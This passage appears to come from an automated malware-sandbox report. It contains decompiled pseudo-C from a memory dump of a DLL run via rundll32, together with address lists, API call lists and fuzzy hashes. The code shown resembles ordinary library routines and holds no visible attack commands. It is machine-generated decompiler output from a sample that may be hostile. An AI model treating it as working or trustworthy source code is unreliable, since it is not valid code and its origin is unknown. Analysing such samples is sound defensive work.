                                                                                                                    									goto L17;
                                                                                                                    								case 5:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                    									__eax =  *__ebx;
                                                                                                                    									_push(__eax);
                                                                                                                    									 *(__ebp - 0x1c) = __eax;
                                                                                                                    									__imp__#2();
                                                                                                                    									__eflags =  *(__ebp - 0x1c);
                                                                                                                    									 *__esi = __eax;
                                                                                                                    									if(__eflags == 0) {
                                                                                                                    										goto L35;
                                                                                                                    									}
                                                                                                                    									__eflags = __eax;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										goto L35;
                                                                                                                    									}
                                                                                                                    									goto L23;
                                                                                                                    								case 6:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                    									 *__ebx =  ~( *__ebx);
                                                                                                                    									asm("sbb eax, eax");
                                                                                                                    									L28:
                                                                                                                    									 *__esi = __ax;
                                                                                                                    									goto L35;
                                                                                                                    								case 7:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                                    									__edi =  *(__ebp - 0x10);
                                                                                                                    									__ebx =  &(__ebx[1]);
                                                                                                                    									__esi =  *__ebx;
                                                                                                                    									asm("movsd");
                                                                                                                    									asm("movsd");
                                                                                                                    									asm("movsd");
                                                                                                                    									asm("movsd");
                                                                                                                    									__esi =  *(__ebp - 0x1c);
                                                                                                                    									_push(4);
                                                                                                                    									_pop(__edi);
                                                                                                                    									goto L35;
                                                                                                                    								case 8:
                                                                                                                    									L24:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                    									__eax =  *__ebx;
                                                                                                                    									_push(__eax);
                                                                                                                    									__ecx = __ebp - 0x18;
                                                                                                                    									 *(__ebp - 0x1c) = __eax;
                                                                                                                    									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                    									_push( *(__ebp - 0x18));
                                                                                                                    									 *((char*)(__ebp - 4)) = 2;
                                                                                                                    									__imp__#2();
                                                                                                                    									__eflags =  *(__ebp - 0x1c);
                                                                                                                    									 *__esi = __eax;
                                                                                                                    									if( *(__ebp - 0x1c) == 0) {
                                                                                                                    										L26:
                                                                                                                    										__ecx =  *(__ebp - 0x18);
                                                                                                                    										__eax =  *(__ebp - 0x10);
                                                                                                                    										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                                                                                    										 *( *(__ebp - 0x10)) = 8;
                                                                                                                    										 *((char*)(__ebp - 4)) = 1;
                                                                                                                    										__eax = E100012C0(__ecx);
                                                                                                                    										goto L35;
                                                                                                                    									}
                                                                                                                    									__eflags = __eax;
                                                                                                                    									if(__eflags == 0) {
                                                                                                                    										L23:
                                                                                                                    										__eax = E100201BD(__ecx);
                                                                                                                    										goto L24;
                                                                                                                    									}
                                                                                                                    									goto L26;
                                                                                                                    								case 9:
                                                                                                                    									goto L35;
                                                                                                                    								case 0xa:
                                                                                                                    									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                    									_t258 = _t258 + _t293;
                                                                                                                    									 *_t299 =  *_t258;
                                                                                                                    									goto L35;
                                                                                                                    								case 0xb:
                                                                                                                    									__eax =  *(__ebp + 0x1c);
                                                                                                                    									__eax =  *(__ebp + 0x1c) + 8;
                                                                                                                    									 *(__ebp + 0x1c) = __eax;
                                                                                                                    									__ebx =  &(__ebx[2]);
                                                                                                                    									__eflags = __ebx;
                                                                                                                    									L17:
                                                                                                                    									__ecx =  *__eax;
                                                                                                                    									 *__esi = __ecx;
                                                                                                                    									 *(__esi + 4) = __eax;
                                                                                                                    									goto L35;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L35:
                                                                                                                    						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                                                                                    						_t299 = _t299 - 0x10;
                                                                                                                    						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                                                                                    						 *(_t300 - 0x1c) = _t299;
                                                                                                                    					} while ( *( *(_t300 - 0x14)) != 0);
                                                                                                                    					_t257 = 0;
                                                                                                                    					goto L37;
                                                                                                                    				}
                                                                                                                    			}

































                                                                                                                    0x1002dec8
                                                                                                                    0x1002ded0
                                                                                                                    0x1002ded1
                                                                                                                    0x1002ded7
                                                                                                                    0x1002ded7
                                                                                                                    0x1002ded9
                                                                                                                    0x1002dedf
                                                                                                                    0x1002dee5
                                                                                                                    0x1002deed
                                                                                                                    0x1002def5
                                                                                                                    0x1002def8
                                                                                                                    0x1002def8
                                                                                                                    0x1002df03
                                                                                                                    0x1002df09
                                                                                                                    0x1002df0b
                                                                                                                    0x1002df12
                                                                                                                    0x1002df17
                                                                                                                    0x1002df1a
                                                                                                                    0x1002df1a
                                                                                                                    0x1002df22
                                                                                                                    0x1002df24
                                                                                                                    0x1002df2b
                                                                                                                    0x1002df30
                                                                                                                    0x1002df33
                                                                                                                    0x1002df33
                                                                                                                    0x1002df3b
                                                                                                                    0x1002df40
                                                                                                                    0x1002df46
                                                                                                                    0x1002df52
                                                                                                                    0x1002df55
                                                                                                                    0x00000000
                                                                                                                    0x1002df55
                                                                                                                    0x1002de8f
                                                                                                                    0x1002de95
                                                                                                                    0x1002de9c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002de9e
                                                                                                                    0x00000000
                                                                                                                    0x1002de4d
                                                                                                                    0x1002de50
                                                                                                                    0x1002de56
                                                                                                                    0x1002de71
                                                                                                                    0x1002de71
                                                                                                                    0x1002de74
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002de5c
                                                                                                                    0x1002de5e
                                                                                                                    0x1002de60
                                                                                                                    0x1002de66
                                                                                                                    0x1002de67
                                                                                                                    0x1002de6d
                                                                                                                    0x1002de6d
                                                                                                                    0x1002de70
                                                                                                                    0x1002de70
                                                                                                                    0x00000000
                                                                                                                    0x1002de70
                                                                                                                    0x1002de62
                                                                                                                    0x1002de64
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002de64
                                                                                                                    0x00000000
                                                                                                                    0x1002de71
                                                                                                                    0x1002dbd0
                                                                                                                    0x1002dbd4
                                                                                                                    0x1002dbd5
                                                                                                                    0x1002dbe4
                                                                                                                    0x1002dbef
                                                                                                                    0x1002dbf2
                                                                                                                    0x1002dbfa
                                                                                                                    0x1002dbfd
                                                                                                                    0x1002dc00
                                                                                                                    0x1002dc06
                                                                                                                    0x1002dc06
                                                                                                                    0x1002dc0a
                                                                                                                    0x1002dc0d
                                                                                                                    0x1002dc10
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc16
                                                                                                                    0x1002dc1b
                                                                                                                    0x1002dc1e
                                                                                                                    0x1002dc24
                                                                                                                    0x1002dc27
                                                                                                                    0x1002dc2a
                                                                                                                    0x1002dc2d
                                                                                                                    0x1002dc33
                                                                                                                    0x1002dc36
                                                                                                                    0x1002dc39
                                                                                                                    0x1002dc43
                                                                                                                    0x1002dc43
                                                                                                                    0x1002dc46
                                                                                                                    0x1002dc4e
                                                                                                                    0x1002dc50
                                                                                                                    0x1002dd6d
                                                                                                                    0x1002dd72
                                                                                                                    0x1002dd75
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd77
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd7e
                                                                                                                    0x1002dd81
                                                                                                                    0x1002dd83
                                                                                                                    0x1002dd89
                                                                                                                    0x1002dd93
                                                                                                                    0x1002dd9a
                                                                                                                    0x1002dd9c
                                                                                                                    0x1002dda8
                                                                                                                    0x1002ddac
                                                                                                                    0x1002ddb1
                                                                                                                    0x1002ddb5
                                                                                                                    0x1002ddb9
                                                                                                                    0x1002ddbb
                                                                                                                    0x1002ddbe
                                                                                                                    0x1002ddc3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc56
                                                                                                                    0x1002dc56
                                                                                                                    0x1002ddc6
                                                                                                                    0x1002ddc6
                                                                                                                    0x1002ddc9
                                                                                                                    0x1002ddc9
                                                                                                                    0x1002ddcd
                                                                                                                    0x00000000
                                                                                                                    0x1002ddcd
                                                                                                                    0x1002dc5d
                                                                                                                    0x1002dc61
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc67
                                                                                                                    0x00000000
                                                                                                                    0x1002dc7c
                                                                                                                    0x1002dc7f
                                                                                                                    0x1002dc81
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dca4
                                                                                                                    0x1002dca8
                                                                                                                    0x1002dcad
                                                                                                                    0x1002dcb0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcb7
                                                                                                                    0x1002dcbb
                                                                                                                    0x1002dcc0
                                                                                                                    0x1002dcc3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcca
                                                                                                                    0x1002dccd
                                                                                                                    0x1002dccf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcd3
                                                                                                                    0x1002dcd6
                                                                                                                    0x1002dcd8
                                                                                                                    0x1002dcda
                                                                                                                    0x1002dcdb
                                                                                                                    0x1002dcde
                                                                                                                    0x1002dce4
                                                                                                                    0x1002dce8
                                                                                                                    0x1002dcea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcf0
                                                                                                                    0x1002dcf2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd45
                                                                                                                    0x1002dd48
                                                                                                                    0x1002dd4c
                                                                                                                    0x1002dd4e
                                                                                                                    0x1002dd50
                                                                                                                    0x1002dd50
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd55
                                                                                                                    0x1002dd59
                                                                                                                    0x1002dd5c
                                                                                                                    0x1002dd5f
                                                                                                                    0x1002dd61
                                                                                                                    0x1002dd62
                                                                                                                    0x1002dd63
                                                                                                                    0x1002dd64
                                                                                                                    0x1002dd65
                                                                                                                    0x1002dd68
                                                                                                                    0x1002dd6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcfd
                                                                                                                    0x1002dcfd
                                                                                                                    0x1002dd00
                                                                                                                    0x1002dd02
                                                                                                                    0x1002dd04
                                                                                                                    0x1002dd05
                                                                                                                    0x1002dd08
                                                                                                                    0x1002dd0b
                                                                                                                    0x1002dd10
                                                                                                                    0x1002dd13
                                                                                                                    0x1002dd17
                                                                                                                    0x1002dd1d
                                                                                                                    0x1002dd21
                                                                                                                    0x1002dd23
                                                                                                                    0x1002dd29
                                                                                                                    0x1002dd29
                                                                                                                    0x1002dd2c
                                                                                                                    0x1002dd2f

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4128688680-0
                                                                                                                    • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                    • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                    • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                    • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E10018B59() {
                                                                                                                    				void* __ebx;
                                                                                                                    				void* __esi;
                                                                                                                    				struct HINSTANCE__* _t5;
                                                                                                                    				_Unknown_base(*)()* _t6;
                                                                                                                    				_Unknown_base(*)()* _t7;
                                                                                                                    				_Unknown_base(*)()* _t8;
                                                                                                                    				_Unknown_base(*)()* _t9;
                                                                                                                    				_Unknown_base(*)()* _t10;
                                                                                                                    				_Unknown_base(*)()* _t11;
                                                                                                                    				_Unknown_base(*)()* _t12;
                                                                                                                    				struct HINSTANCE__* _t18;
                                                                                                                    				void* _t20;
                                                                                                                    				intOrPtr _t23;
                                                                                                                    				_Unknown_base(*)()* _t24;
                                                                                                                    
                                                                                                                    				_t23 =  *0x100572e4; // 0x0
                                                                                                                    				if(_t23 == 0) {
                                                                                                                    					_push(_t20);
                                                                                                                    					 *0x100572e8 = E10018B01(0, _t20, __eflags);
                                                                                                                    					_t18 = GetModuleHandleA("USER32");
                                                                                                                    					__eflags = _t18;
                                                                                                                    					if(_t18 == 0) {
                                                                                                                    						L12:
                                                                                                                    						 *0x100572c8 = 0;
                                                                                                                    						 *0x100572cc = 0;
                                                                                                                    						 *0x100572d0 = 0;
                                                                                                                    						 *0x100572d4 = 0;
                                                                                                                    						 *0x100572d8 = 0;
                                                                                                                    						 *0x100572dc = 0;
                                                                                                                    						 *0x100572e0 = 0;
                                                                                                                    						_t5 = 0;
                                                                                                                    					} else {
                                                                                                                    						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                    						__eflags = _t6;
                                                                                                                    						 *0x100572c8 = _t6;
                                                                                                                    						if(_t6 == 0) {
                                                                                                                    							goto L12;
                                                                                                                    						} else {
                                                                                                                    							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                    							__eflags = _t7;
                                                                                                                    							 *0x100572cc = _t7;
                                                                                                                    							if(_t7 == 0) {
                                                                                                                    								goto L12;
                                                                                                                    							} else {
                                                                                                                    								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                    								__eflags = _t8;
                                                                                                                    								 *0x100572d0 = _t8;
                                                                                                                    								if(_t8 == 0) {
                                                                                                                    									goto L12;
                                                                                                                    								} else {
                                                                                                                    									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                    									__eflags = _t9;
                                                                                                                    									 *0x100572d4 = _t9;
                                                                                                                    									if(_t9 == 0) {
                                                                                                                    										goto L12;
                                                                                                                    									} else {
                                                                                                                    										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                    										__eflags = _t10;
                                                                                                                    										 *0x100572dc = _t10;
                                                                                                                    										if(_t10 == 0) {
                                                                                                                    											goto L12;
                                                                                                                    										} else {
                                                                                                                    											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                    											__eflags = _t11;
                                                                                                                    											 *0x100572d8 = _t11;
                                                                                                                    											if(_t11 == 0) {
                                                                                                                    												goto L12;
                                                                                                                    											} else {
                                                                                                                    												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                    												__eflags = _t12;
                                                                                                                    												 *0x100572e0 = _t12;
                                                                                                                    												if(_t12 == 0) {
                                                                                                                    													goto L12;
                                                                                                                    												} else {
                                                                                                                    													_t5 = 1;
                                                                                                                    													__eflags = 1;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					 *0x100572e4 = 1;
                                                                                                                    					return _t5;
                                                                                                                    				} else {
                                                                                                                    					_t24 =  *0x100572d8; // 0x0
                                                                                                                    					return 0 | _t24 != 0x00000000;
                                                                                                                    				}
                                                                                                                    			}


















                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                    • API String ID: 667068680-68207542
                                                                                                                    • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                    • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                    • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                    • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v24;
                                                                                                                    				int _v28;
                                                                                                                    				intOrPtr _v32;
                                                                                                                    				intOrPtr _v36;
                                                                                                                    				intOrPtr _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				struct HWND__* _v52;
                                                                                                                    				signed int _t139;
                                                                                                                    				signed int _t141;
                                                                                                                    				void* _t142;
                                                                                                                    				signed int _t146;
                                                                                                                    				signed int _t149;
                                                                                                                    				intOrPtr _t150;
                                                                                                                    				signed int _t152;
                                                                                                                    				signed char _t153;
                                                                                                                    				signed int _t154;
                                                                                                                    				signed int _t155;
                                                                                                                    				int _t156;
                                                                                                                    				signed int _t161;
                                                                                                                    				signed int _t165;
                                                                                                                    				void* _t167;
                                                                                                                    				signed char _t171;
                                                                                                                    				signed int _t172;
                                                                                                                    				signed int _t173;
                                                                                                                    				signed int _t174;
                                                                                                                    				signed char _t182;
                                                                                                                    				intOrPtr _t183;
                                                                                                                    				signed int _t184;
                                                                                                                    				short _t188;
                                                                                                                    				signed int _t189;
                                                                                                                    				signed int _t190;
                                                                                                                    				signed int _t191;
                                                                                                                    				signed int _t195;
                                                                                                                    				signed int _t198;
                                                                                                                    				signed char _t199;
                                                                                                                    				signed int _t200;
                                                                                                                    				signed int _t201;
                                                                                                                    				short _t204;
                                                                                                                    				signed int _t206;
                                                                                                                    				signed int _t207;
                                                                                                                    				signed int _t208;
                                                                                                                    				signed int _t209;
                                                                                                                    				void* _t211;
                                                                                                                    				signed int _t215;
                                                                                                                    				signed int _t216;
                                                                                                                    				struct HWND__* _t217;
                                                                                                                    				struct tagMSG* _t221;
                                                                                                                    				intOrPtr _t224;
                                                                                                                    				void* _t231;
                                                                                                                    				struct tagMSG* _t240;
                                                                                                                    				signed int _t242;
                                                                                                                    				int _t243;
                                                                                                                    				signed int _t244;
                                                                                                                    				long _t247;
                                                                                                                    				intOrPtr _t249;
                                                                                                                    				signed int _t251;
                                                                                                                    				signed int _t254;
                                                                                                                    				signed int _t255;
                                                                                                                    				signed int _t256;
                                                                                                                    				signed int _t257;
                                                                                                                    				signed int _t258;
                                                                                                                    				void* _t260;
                                                                                                                    				void* _t262;
                                                                                                                    
                                                                                                                    				_t232 = __ecx;
                                                                                                                    				_t260 = _t262;
                                                                                                                    				_push(__ecx);
                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                    				_push(__ebx);
                                                                                                                    				_push(__esi);
                                                                                                                    				_push(__edi);
                                                                                                                    				_t139 = E1002A5D5(_a4, _a8);
                                                                                                                    				_t238 = _t139;
                                                                                                                    				if(_t139 == 0) {
                                                                                                                    					_t232 = _a4;
                                                                                                                    					_t231 = E100199B2(_a4);
                                                                                                                    					if(_t231 != 0) {
                                                                                                                    						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                                                                                    						_a8 = _t221;
                                                                                                                    						if(_t221 != 0) {
                                                                                                                    							while(1) {
                                                                                                                    								_t9 = _t231 + 0x40; // 0x40
                                                                                                                    								_t232 = _t9;
                                                                                                                    								_t258 =  *(E10017B95( &_a8));
                                                                                                                    								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                                                                                    								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                                                                                    									if(_a8 != 0) {
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    								goto L10;
                                                                                                                    							}
                                                                                                                    							_t238 = _t258;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				L10:
                                                                                                                    				_t247 = 0;
                                                                                                                    				while(1) {
                                                                                                                    					_t238 = E1002A627(_t232, _a4, _t238, _a12);
                                                                                                                    					if(_t238 == 0) {
                                                                                                                    						break;
                                                                                                                    					}
                                                                                                                    					_t142 = E1002A0D2(_t238);
                                                                                                                    					_pop(_t232);
                                                                                                                    					if(_t142 == 0) {
                                                                                                                    						L14:
                                                                                                                    						if(_t238 == 0) {
                                                                                                                    							L21:
                                                                                                                    							__eflags =  *(_t238 + 4);
                                                                                                                    							if( *(_t238 + 4) == 0) {
                                                                                                                    								E100201F1(_t232);
                                                                                                                    								asm("int3");
                                                                                                                    								_push(0x28);
                                                                                                                    								E10030D5A(E10044D1A, 0, _t238, _t247);
                                                                                                                    								_t146 = _a4;
                                                                                                                    								__eflags = _t146;
                                                                                                                    								if(_t146 != 0) {
                                                                                                                    									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                                                                                    								} else {
                                                                                                                    									_v48 = _v48 & _t146;
                                                                                                                    								}
                                                                                                                    								_t240 = _a8;
                                                                                                                    								_t249 = _t240->message;
                                                                                                                    								_v32 = _t249;
                                                                                                                    								_v52 = GetFocus();
                                                                                                                    								_t149 = E1001B042(0, _t260, _t148);
                                                                                                                    								_t229 = 0x100;
                                                                                                                    								__eflags = _t249 - 0x100;
                                                                                                                    								_v24 = _t149;
                                                                                                                    								if(_t249 < 0x100) {
                                                                                                                    									L34:
                                                                                                                    									__eflags = _t249 + 0xfffffe00 - 9;
                                                                                                                    									if(_t249 + 0xfffffe00 > 9) {
                                                                                                                    										goto L56;
                                                                                                                    									} else {
                                                                                                                    										goto L35;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t249 - 0x109;
                                                                                                                    									if(_t249 <= 0x109) {
                                                                                                                    										L35:
                                                                                                                    										__eflags = _t149;
                                                                                                                    										if(_t149 == 0) {
                                                                                                                    											L56:
                                                                                                                    											_t251 = 0;
                                                                                                                    											_v28 = 0;
                                                                                                                    											_t150 = E1001B042(_t229, _t260,  *_t240);
                                                                                                                    											_v44 = _v44 & 0;
                                                                                                                    											_v36 = _t150;
                                                                                                                    											_t152 = _v32 - _t229;
                                                                                                                    											__eflags = _t152;
                                                                                                                    											_v40 = 2;
                                                                                                                    											if(_t152 == 0) {
                                                                                                                    												_t153 = E1002A085(_v36, _t240);
                                                                                                                    												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                    												__eflags = _t232 - 0x1b;
                                                                                                                    												if(__eflags > 0) {
                                                                                                                    													__eflags = _t232 - 0x25;
                                                                                                                    													if(_t232 < 0x25) {
                                                                                                                    														goto L75;
                                                                                                                    													} else {
                                                                                                                    														__eflags = _t232 - 0x26;
                                                                                                                    														if(_t232 <= 0x26) {
                                                                                                                    															_v44 = 1;
                                                                                                                    															goto L110;
                                                                                                                    														} else {
                                                                                                                    															__eflags = _t232 - 0x28;
                                                                                                                    															if(_t232 <= 0x28) {
                                                                                                                    																L110:
                                                                                                                    																_t171 = E1002A085(_v24, _t240);
                                                                                                                    																__eflags = _t171 & 0x00000001;
                                                                                                                    																if((_t171 & 0x00000001) != 0) {
                                                                                                                    																	goto L75;
                                                                                                                    																} else {
                                                                                                                    																	__eflags = _v44;
                                                                                                                    																	_t232 = _a4;
                                                                                                                    																	_push(0);
                                                                                                                    																	if(_v44 == 0) {
                                                                                                                    																		_t172 = E1001E706(_t232);
                                                                                                                    																	} else {
                                                                                                                    																		_t172 = E1001E6B8(_t232);
                                                                                                                    																	}
                                                                                                                    																	_t254 = _t172;
                                                                                                                    																	__eflags = _t254;
                                                                                                                    																	if(_t254 == 0) {
                                                                                                                    																		goto L75;
                                                                                                                    																	} else {
                                                                                                                    																		__eflags =  *(_t254 + 8);
                                                                                                                    																		if( *(_t254 + 8) != 0) {
                                                                                                                    																			_t232 = _a4;
                                                                                                                    																			E1001E262(_a4, _t254);
                                                                                                                    																		}
                                                                                                                    																		__eflags =  *(_t254 + 4);
                                                                                                                    																		if( *(_t254 + 4) == 0) {
                                                                                                                    																			_t173 =  *_t254;
                                                                                                                    																			__eflags = _t173;
                                                                                                                    																			if(_t173 == 0) {
                                                                                                                    																				_t232 = _a4;
                                                                                                                    																				_t174 = E1002A143(_a4, _v24, _v44);
                                                                                                                    																			} else {
                                                                                                                    																				_t174 = E1001B042(_t229, _t260, _t173);
                                                                                                                    																			}
                                                                                                                    																			_t242 = _t174;
                                                                                                                    																			__eflags = _t242;
                                                                                                                    																			if(_t242 == 0) {
                                                                                                                    																				goto L75;
                                                                                                                    																			} else {
                                                                                                                    																				_t229 = 0;
                                                                                                                    																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                                                                                    																				E1002A17D(_t242);
                                                                                                                    																				__eflags =  *(_t254 + 8);
                                                                                                                    																				if( *(_t254 + 8) != 0) {
                                                                                                                    																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                                                                                    																				}
                                                                                                                    																				goto L125;
                                                                                                                    																			}
                                                                                                                    																		} else {
                                                                                                                    																			_t232 =  *(_t254 + 4);
                                                                                                                    																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                                                                                    																			goto L125;
                                                                                                                    																		}
                                                                                                                    																	}
                                                                                                                    																}
                                                                                                                    															} else {
                                                                                                                    																__eflags = _t232 - 0x2b;
                                                                                                                    																if(_t232 != 0x2b) {
                                                                                                                    																	goto L75;
                                                                                                                    																} else {
                                                                                                                    																	goto L97;
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    													goto L126;
                                                                                                                    												} else {
                                                                                                                    													if(__eflags == 0) {
                                                                                                                    														L103:
                                                                                                                    														_t243 = 0;
                                                                                                                    														__eflags = 0;
                                                                                                                    														goto L104;
                                                                                                                    													} else {
                                                                                                                    														__eflags = _t232 - 3;
